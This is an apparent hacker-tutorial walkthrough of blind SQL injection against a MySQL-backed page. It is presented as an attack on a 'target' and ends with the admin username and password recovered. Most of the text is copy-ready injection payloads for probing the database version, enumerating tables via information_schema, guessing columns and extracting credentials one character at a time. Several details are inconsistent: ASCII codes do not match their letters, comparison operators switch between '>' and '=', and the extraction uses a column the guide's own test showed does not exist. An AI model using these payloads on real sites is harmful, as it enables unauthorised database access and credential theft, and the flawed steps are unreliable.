Blind based SQL Injection


It’s called blind SQL Injection as the webpage will not output any of our vulnerable columns.
How to check if you are working with blind SQL Injection:
1.       AND 1=1—(This should receive the same page properly)
2.       AND 1=2—(As this is obviously not true, it should not properly load page, or not loader page at all)
n  Remember! It can be as little as a picture not loading, or a small amount of text is missing!
Exploiting our target, as my target has just failed to load certain text that was there before after submitting my 1=2—query.
First we will check the MySQL version they are running (IMPORTANT!)
www.example.com/page.php?id=1 +AND substring (@@version, 1,1)=5
Let me break it down for you:
*
Substring:  were using substring to break up the data into a true/false situation meaning IF
the first digit in the query response is "5" then we know that the version is greater than or equal to version.
If we get an error page on this it means our version is 4 or less, we can check it by changing the digit “5” to 4.
Now for exploiting our target, and revealing the database’s within.
First off we want to know which tables it has, as my version = MySQL 5 I know there is a information_schema available!
www.example.com/page.php?id= 1/**/and/**/ascii(substring((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))>50
Now to gain the database names, we will have to do this 1 by 1, and use an ASCII chart to change our numbers to > letters with :) .
The one I use for this is:
Now to exploiting our targets database I will lay out some queries all in a row and then explain them.




/**/and/**/ascii(substring((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))=109  ( M )
/**/and/**/ascii(substring((select table_name from information_schema.tables where table_schema=database() limit 0,1),2,1))>120  ( X )
/**/and/**/ascii(substring((select table_name from information_schema.tables where table_schema=database() limit 0,1),3,1))>84  ( T )  
/**/and/**/ascii(substring((select table_name from information_schema.tables where table_schema=database() limit 0,1),4,1))>117  ( U )
/**/and/**/ascii(substring((select table_name from information_schema.tables where table_schema=database() limit 0,1),4,1))>84  ( T )
Which comes out in: mxtut

I have highlighted the 0 for a purpose, as you might remember, we are using LIMIT meaning we show 1 table a time, and this might be unlucky and a table where there is no admin info inside, therefore you have to increase the number when you want to make sure you have all the info you wanted.
Now it’s time to guess a bit, or you can Google up well known usernames for certain CMS.
As we know our table name, we just need to start guessing the columns within the table (well sort of) as we will still compare with the database if our query = true if so it will show you.
/**/and/**/(SELECT substring(concat(1,user),1,1) from mxtut limit 0,1)=1  false
·         This showing us that “user” is not a column in mxtut!
/**/and/**/(SELECT substring(concat(1,id),1,1) from mxtut limit 0,1)=1  Its true..
·         This showing us that “id” is found in mxtut!
/**/and/**/(SELECT substring(concat(1,username),1,1) from mxtut limit 0,1)=1  Its true..
·         This showing us that “username” is also a column in mxtut table!

/**/and/**/(SELECT substring(concat(1,name),1,1) from mxtut limit 0,1)=1  false
/**/and/**/(SELECT substring(concat(1,users),1,1) from mxtut limit 0,1)=1  fasle
/**/and/**/(SELECT substring(concat(1,pass),1,1) from mxtut limit 0,1)=1 Its true..
·         Yay that means we have all the info we need to properly request the ID – Username & Password from our database!
/**/and/**/(SELECT substring(concat(1,password),1,1) from mxtut limit 0,1)=1 false..

So now that we found ID – Username – Password we can continue extracting the data and we do that with the following queries:

/**/and ascii(substring((SELECT concat(username) from mxtut where id=1),1,1))=109 M
/**/and ascii(substring((SELECT concat(username) from mxtut where id=1),2,1))=120 X
/**/and ascii(substring((SELECT concat(username) from mxtut where id=1),3,1))=84 T
/**/and ascii(substring((SELECT concat(username) from mxtut where id=1),4,1))=117 U
/**/and ascii(substring((SELECT concat(username) from mxtut where id=1),5,1))=84  T

Which results in: mxtut
So now that we know that the username used is mxtut we can use the same query by simply changing username into password
/**/and ascii(substring((SELECT concat(password) from mxtut where id=1),1,1))=109 M
/**/and ascii(substring((SELECT concat(password) from mxtut where id=1),2,1))=120 X
/**/and ascii(substring((SELECT concat(password) from mxtut where id=1),3,1))=103 G
/**/and ascii(substring((SELECT concat(password) from mxtut where id=1),4,1))=111 O
/**/and ascii(substring((SELECT concat(password) from mxtut where id=1),5,1))=100 D
Which results in: mxgod

Where our end results in successfully gaining username and password with blind SQLi!
Userame: mxtut
Password: mxgod